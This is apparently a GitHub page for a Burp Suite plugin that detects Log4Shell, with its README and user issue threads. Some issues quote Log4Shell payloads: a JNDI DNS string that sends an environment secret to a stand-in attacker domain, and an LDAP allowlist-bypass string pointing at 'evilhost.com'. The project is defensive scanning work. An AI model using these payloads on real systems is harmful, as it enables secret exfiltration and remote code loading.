Log4Shell scanner for Burp Suite

Overview

Log4Shell scanner for Burp Suite

screenshot

Detailed description can be found in our blog post about this plugin.

Comparison

Feature Log4Shell scanner (this one) ActiveScan++ (PortSwigger/active-scan-plus-plus@b485a07)
Synchronous detection ✔️ ✔️
Asynchronous detection ✔️
Hostname detection ✔️
Username detection ✔️

Building

Execute ./gradlew build and you'll have the plugin ready in build/libs/burp-log4shell.jar

License

The whole project is available under the GNU General Public License v3.0, see LICENSE.md.

Comments
  • Fails to detect Log4Shell vulnerability

    Fails to detect Log4Shell vulnerability

    Using the docker image at https://github.com/christophetd/log4shell-vulnerable-app, this plug fails to detect any issues. I've tried the prebuilt jar, and even tried building myself. Same results.

    bug 
    opened by CountMurphy 16
  • Payloads are not sent with the plugin

    Payloads are not sent with the plugin

    ENV

    Burp: v2021.12.1

    log4j-8

    docker run --name vulnerable-app --rm -p 8000:8080 ghcr.io/christophetd/log4shell-vulnerable-app
    

    Easy Scan

    0 Request was sent.

    log4j-1 log4j-2 log4j-3 log4j-4

    Scan from intruder

    2 identical requests were sent. Neither has the payloads.

    log4j-5 log4j-6 log4j-7

    opened by isrtest 10
  • [Request] - Add check for unencoded URI Path

    [Request] - Add check for unencoded URI Path

    In my internal environment testing we've found some hosts/products that have been vulnerable to the Log4J vulnerability but where it would only fire if the URI path was NOT URL encoded. These hosts are not showing any vulnerable parameters when scanned using the plugin but will fire if I take the payload, un-encode it, and replay it in Repeater. When we check the logs generated, we found that it is logging the raw URI and this was causing the payload to not be interpreted by the vulnerable class. In these hosts, only the URI was vulnerable so the other non-encoded positions such as User-Agent were not being processed.

    Thanks for putting this out, BTW!

    enhancement 
    opened by zombietango 7
  • Hard way is not that hard

    Hard way is not that hard

    Hi! I think that the hard way can be simplified in this way:

    1. on issue reported list, CTRL+A to select all the issues, right-click->enabled to disable everything
    2. go at the very bottom and select only Extension generated issue That's it! Let me know if it is working for you:)
    opened by alright21 4
  • [Feature] Add context menu option to only scan for log4j

    [Feature] Add context menu option to only scan for log4j

    Hi folks,

    while the method you described to only scan for log4j is viable there is an easier way to do it in Burp, via adding a context menu option. It should go something like:

    scanMenu = JMenuItem("Log4j scan")
    scanMenu.addActionListener(startScan(self))
    
    self.menu = JPopupMenu("Popup")
    self.menu.add(scanMenu)
    
    callbacks.registerContextMenuFactory(self)
    
    

    where startScan is something like:

    class sendRequestRepeater(ActionListener):
        def __init__(self, extender):
            self._extender = extender
    
        def actionPerformed(self, e):
    
      
                self._extender.doActiveScan(...);
    
            return 
    
    

    I know this in Python but you get the idea; there are many extensions that hook into registerContextMenuFactory so you can just copy from there. Let me know if I can help, cheers :)

    Fisher

    enhancement 
    opened by Regala 3
  • Only detecting JNDI + LDAP exploit variant - other exploits of CVE are undetected

    Only detecting JNDI + LDAP exploit variant - other exploits of CVE are undetected

    Describe the bug Even with LDAP to remote host being stopped by using a modern Java version, there are still more ways to exploit the CVE. But (based on looking at the source) this scan only checks the LDAP exploit path. So a clean sheet from this scan doesn't mean that you're not vulnerable.

    Example of a non-LDAP attack: ${jndi:dns://attackers-dns-server.com/somedomain${env:SECRET_TO_LEAK_VIA_DNS_QUERY}}

    or via Factory Gadget attacks

    See Appendix B of https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/

    Sanity Check

    • [x] I'm not trying to blindly scan random hosts without any configuration and wait for free money from their bug bounty programs.
    opened by andy-may-at 3
  •  small improvements

    small improvements

    I've opened this to portswigger's fork of yours - https://github.com/PortSwigger/log4shell-scanner/pull/2

    In case you want to merge them sooner :) (and care to comment as you're actually the developer and I only noticed after opening the PR)

    opened by fopina 2
  • Out of box Burp with single extension not discover Log4shell

    Out of box Burp with single extension not discover Log4shell

    Hi! I've just installed burp pro out of box and the only extension I have added is yours. Unfortunately I am not able to discover any trails of log4shell even I have identified few of such that should be reported based on release notes etc.. Are there any extra plugins/settings that should be enabled/installed to make it scan successfully? Also - should the scan be started from the "/" URL of the target ? Thanks ! Screenshot from 2021-12-14 11-25-48

    Screenshot from 2021-12-14 11-25-34

    opened by pawel16151 2
  • Running burp-log4shell.jar

    Running burp-log4shell.jar

    Hello,

    It's been a while since I've executed .jar files, I was under the impression that the command is java -jar, yet I get the following:

    java -jar burp-log4shell.jar
    no main manifest attribute, in burp-log4shell.jar
    

    Environment:

    java --version
    openjdk 11.0.13 2021-10-19
    OpenJDK Runtime Environment 18.9 (build 11.0.13+8)
    OpenJDK 64-Bit Server VM 18.9 (build 11.0.13+8, mixed mode)
    
    opened by dandrei 2
  • Report successful plugin load

    Report successful plugin load

    Unfortunately Burp Suite API doesn't provide any facilities to check plugin states in runtime. All plugins are loaded in background, so when Burp Suite is up and running is not the same as all plugins are ready. The only way to automate these things is to monitor standard output/error of the plugin, but it doesn't report anything useful after being loaded.

    enhancement 
    opened by tuxofil 1
  • Protobuf version error

    Protobuf version error

    Hi,

    To be able to build this I have to change the protobuf version in build.gradle to be: classpath "gradle.plugin.com.google.protobuf:protobuf-gradle-plugin:0.8.18"

    opened by ErwinGeirnaert 1
  • CVE coverage

    CVE coverage

    Hi,

    Could you please confirm whether Log4Shell Scanner Burpsuite Pro Addon is capable to identify log4j vulnerabilities of CVE-2021-44832, CVE-2021-45105 & CVE-2021-45046.

    Thanks Saleem Choudary

    question 
    opened by saleem024 1
  • Additional payloads for allowedLdapHost and allowedClasses bypass

    Additional payloads for allowedLdapHost and allowedClasses bypass

    This will require improved payloads:

    https://twitter.com/marcioalm/status/1471740771581652995

    Example from the twitter:

    ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
    
    enhancement 
    opened by v-p-b 2
  • Detecting delayed responses/timeouts?

    Detecting delayed responses/timeouts?

    I wonder if it would make sense to generate a low confidence issue if the answer takes >29s to arrive (I've read that Java timeouts after 31s and Burp drops the conn at 30s IIRC), as this can indicate that someone is trying to resolve our JNDI host on the backend?

    enhancement 
    opened by v-p-b 3
Releases(v0.2.3)
Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth

Log4J Scanner Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth. Disclaimer I am not responsible for your actions, bur

Dexter0us 94 Nov 22, 2022
Burp extension to create target specific and tailored wordlist from burp history.

Burp extension to create target specific and tailored wordlist from burp history.

Dexter0us 173 Jan 2, 2023
Uproot-JS - Extract JavaScript files from burp suite project with ease

Extract JavaScript files from burp suite project with ease. Disclaimer I am not

Dexter0us 50 Aug 8, 2022
ZATAC Scanner is Android Kotlin-based QR code scanner and parser which de-crypt TLV qr codes and parse them into their values.

ZATAC Scanner is Android Kotlin-based QR code scanner and parser which de-crypt TLV qr codes and parse them into their values.

Enozom 12 Apr 23, 2022
D4rK QR & Bar Code Scanner Plus is a FOSS scanner app for every Android. 📷

?? QR & Bar Code Scanner Plus ?? ╔╦╦╦═╦╗╔═╦═╦══╦═╗ ║║║║╩╣╚╣═╣║║║║║╩╣ ╚══╩═╩═╩═╩═╩╩╩╩═╝ D4rK QR & Bar Code Scanner Plus is a FOSS scanner app for every

D4rK 8 Dec 19, 2022
A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228/Log4Shell)

Log4j2 RCE Vulnerability POC A bare minimum proof-of-concept for Log4j2 JNDI Remote-Code-Execution vulnerability (CVE-2021-44228). This is intended fo

Sola 4 Aug 17, 2022
log4shell detector similar to log4jscanner, log4j-detector etc but built with ProGuardCORE

Log4Shell detector Yet another log4shell detector, similar to log4jscanner, log4

James Hamilton 4 Jan 17, 2022
Cocos2d-x is a suite of open-source, cross-platform, game-development tools used by millions of developers all over the world.

cocos2d-x Win32 Others cocos2d-x is a multi-platform framework for building 2d games, interactive books, demos and other graphical applications. It is

cocos2d 16.7k Dec 31, 2022
Cocos2d-x is a suite of open-source, cross-platform, game-development tools used by millions of developers all over the world.

cocos2d-x Win32 Others cocos2d-x is a multi-platform framework for building 2d games, interactive books, demos and other graphical applications. It is

cocos2d 16.7k Jan 7, 2023
DAVx⁵ is an open-source CalDAV/CardDAV suite and sync app for Android.

DAVx⁵ Please see the DAVx⁵ Web site for comprehensive information about DAVx⁵. DAVx⁵ is licensed under the GPLv3 License. News and updates: @davx5app

bitfire web engineering 478 Dec 28, 2022
Account-lib - A suite of libraries to facilitate the usage of account-sdk

Usage Clone this repository (skip this step if the repo is on your local machine). The default branch is fine. git clone https://github.com/AFBlockcha

null 0 May 24, 2022
A Burp extension to find stuff ¯\_(ツ)_/¯

FindStuffer FindStuffer, a Burp extension to find stuff, both for Community and Pro versions. You can use FindStuffer to aggregate as many text querie

Raphaël Akladios 8 Jun 11, 2022
Improve automated and semi-automated active scanning in Burp Pro

PentagridScanController Improve automated and semi-automated active scanning for BurpSuite Author: Tobias "floyd" Ospelt, @floyd_ch, http://www.floyd.

Pentagrid AG 48 Dec 13, 2022
Barcode Scanner Libraries for Android

Project Archived July 1 2020 This project is no longer maintained. When I first started this project in late 2013 there were very few libraries to hel

Dushyanth 5.4k Jan 3, 2023
Barcode scanner library for Android, based on the ZXing decoder

ZXing Android Embedded Barcode scanning library for Android, using ZXing for decoding. The project is loosely based on the ZXing Android Barcode Scann

JourneyApps 5.3k Jan 4, 2023
Barcode Scanner Libraries for Android

Project Archived July 1 2020 This project is no longer maintained. When I first started this project in late 2013 there were very few libraries to hel

Dushyanth 5.4k Jan 9, 2023
A toy port scanner to help me (and you!) learn Kotlin + Akka.

kotlin-akka-portscan A toy program to help me (and you!) learn Kotlin + Akka. butwhy.gif When I want to learn a new language, I've found it helpful to

Jeremi M Gosney 4 Jul 23, 2022
Yet another barcode scanner for Android

Binary Eye Yet another barcode scanner for Android. As if there weren't enough. This one is free, without any ads and open source. Works in portrait a

Markus Fisch 802 Dec 31, 2022
Pw0 Framewrok - magical android pentest app 🔮! Pixie Dust, Handshakes, Deauth, Nmap, Port scanner and more!

Pw0 Framework Pw0 Framewrok - magical android pentest app ?? ! Features: Pixie Dust Handshakes Deauth Nmap Port scanner and more! Version: 0.2 Beta Au

Huntmix 17 Sep 27, 2021
Pw0 Framewrok - magical android pentest app 🔮! Pixie Dust, Handshakes, Deauth, Nmap, Port scanner and more!

Pw0 Framework Pw0 Framewrok - magical android pentest app ?? ! Features: Pixie Dust Handshakes Deauth Nmap Port scanner and more! Version: 0.2 Beta Au

Zalexdev 17 Sep 27, 2021